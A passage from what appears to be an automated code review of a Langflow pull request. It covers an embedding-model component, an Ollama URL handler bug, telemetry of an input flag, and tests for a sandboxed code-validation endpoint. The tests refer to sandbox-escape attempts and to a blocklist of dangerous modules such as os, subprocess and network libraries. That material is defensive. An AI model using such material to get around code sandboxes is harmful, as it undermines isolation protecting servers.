"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
},
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
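
A tiny, self-contained sketch of the fallback behavior described above; `resolve_ollama_url` is a hypothetical helper name used only for illustration, not code from the PR:

```python
# Prefer the value just entered in the UI; fall back to the stored attribute.
# resolve_ollama_url is a made-up name for illustration only.
def resolve_ollama_url(field_value: str | None, instance_url: str) -> str:
    return field_value or instance_url


assert resolve_ollama_url("http://remote:11434", "http://localhost:11434") == "http://remote:11434"
assert resolve_ollama_url("", "http://localhost:11434") == "http://localhost:11434"
assert resolve_ollama_url(None, "http://localhost:11434") == "http://localhost:11434"
```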

Comment on lines +2038 to +2056
"input_text": {
"_input_type": "BoolInput",
"advanced": true,
"display_name": "Include the original text in the output",
"dynamic": false,
"info": "",
"list": false,
"list_add_label": "Add More",
"name": "input_text",
"placeholder": "",
"required": false,
"show": false,
"title_case": false,
"tool_mode": false,
"trace_as_metadata": true,
"track_in_telemetry": true,
"type": "bool",
"value": true
},

⚠️ Potential issue | 🟡 Minor

Telemetry/privacy check for the input_text flag.

The field is tracked in telemetry (track_in_telemetry: true). Ensure only the boolean flag is captured (never the original text itself) and that analytics pipelines cannot infer content from it. If that cannot be guaranteed, disable tracking for this field.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.

Comment on lines +136 to +213
response = await client.post(
"api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers
)
result = response.json()
assert response.status_code == status.HTTP_200_OK
# Code executes but in isolation - sys is imported fresh, not server's sys


@pytest.mark.usefixtures("active_user")
async def test_validate_code_allows_safe_code(client: AsyncClient, logged_in_headers):
"""Test that legitimate safe code still works."""
safe_code = """
from typing import List, Optional
def process(items: List[str]) -> Optional[str]:
return items[0] if items else None
"""
response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers)
result = response.json()
assert response.status_code == status.HTTP_200_OK
# Should have no errors for safe code
assert len(result["imports"]["errors"]) == 0
assert len(result["function"]["errors"]) == 0


# Isolation verification tests
#
# IMPORTANT: These tests verify that the validate endpoint uses the sandbox.
# The actual isolation behavior is tested in src/lfx/tests/unit/custom/test_sandbox_isolation.py
# These tests just verify that dangerous code executes without crashing (proves sandbox is used)
@pytest.mark.usefixtures("active_user")
async def test_validate_code_allows_safe_imports(client: AsyncClient, logged_in_headers):
"""Test that safe imports are allowed."""
# Code with safe imports should work
safe_code = """
from typing import List, Optional
import json
import math
def test(items: List[str]) -> Optional[str]:
return json.dumps({"count": math.sqrt(len(items))})
"""
response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers)
result = response.json()
assert response.status_code == status.HTTP_200_OK
# Should execute without errors - safe imports are allowed
assert len(result["imports"]["errors"]) == 0
assert len(result["function"]["errors"]) == 0


@pytest.mark.usefixtures("active_user")
async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers):
"""Test that third-party libraries (not in a whitelist) can be imported.
Users should be able to import legitimate third-party libraries like AI libraries,
data processing libraries, etc. We only block dangerous system-level modules.
"""
# Try importing a common third-party library that wouldn't be in a whitelist
# Using 'requests' as an example - it's a legitimate library but not dangerous
# Note: This test will fail if 'requests' isn't installed, but that's okay
# The important thing is that if it IS installed, it should be allowed
third_party_code = """
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
def test():
return HAS_REQUESTS
"""
response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers)
result = response.json()
assert response.status_code == status.HTTP_200_OK
# Should execute without errors - third-party libraries are allowed
# (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.)
assert len(result["imports"]["errors"]) == 0
assert len(result["function"]["errors"]) == 0

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Fix unused result and align third‑party import expectations with sandbox blocklist

  • In test_validate_code_cannot_access_server_globals (Line 139), result = response.json() is never used, which triggers Ruff F841. Either drop the assignment or assert on the returned payload (for example, that "sys" or "blocked" appears in the combined imports/function errors to confirm the sandbox blocked the module).

  • In test_validate_code_allows_third_party_libraries, the test asserts that importing requests never produces errors, but the sandbox’s BLOCKED_MODULES currently includes "requests" and "httpx" as dangerous network modules. With that configuration, create_isolated_import("requests", ...) will raise a SecurityViolation, and validate_code will populate imports["errors"], causing this test to fail.

You’ll want to either:

  • Treat network libraries as allowed during validation (remove requests/httpx from BLOCKED_MODULES), or
  • Relax this test to something like “if requests is installed and not blocklisted, the import should succeed”, or gate it with pytest.importorskip("requests") and adjust expectations based on the sandbox policy.

Right now, the test’s assertion that “third‑party libraries are allowed” conflicts with the current sandbox blocklist.


🏁 Script executed:

#!/bin/bash
# Confirm BLOCKED_MODULES contents and observe validate-code behavior for `requests`.
python - << 'PY'
from lfx.custom.sandbox import BLOCKED_MODULES
print("BLOCKED_MODULES:", sorted(BLOCKED_MODULES))

from lfx.custom.validate import validate_code

code = "import requests\n"
print("validate_code result:", validate_code(code))
PY

Length of output: 115


The web search results provide general information about Python sandbox patterns, but not the specific codebase. Let me inspect the actual source files directly using shell commands.


---

🏁 Script executed:

#!/bin/bash
# Find and inspect the sandbox and validate modules
find . -type f -name "*.py" | grep -E "(sandbox|validate)" | head -20

Length of output: 610


🏁 Script executed:

#!/bin/bash
# Search for BLOCKED_MODULES and validate_code in the repo
fd -e py -x rg -l "BLOCKED_MODULES|validate_code" {} \; | head -20

Length of output: 484



---

🏁 Script executed:

#!/bin/bash
# Read BLOCKED_MODULES from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | head -100

Length of output: 2782


🏁 Script executed:

#!/bin/bash
# Read validate_code function from lfx validate.py
cat ./src/lfx/src/lfx/custom/validate.py

Length of output: 18706


🏁 Script executed:

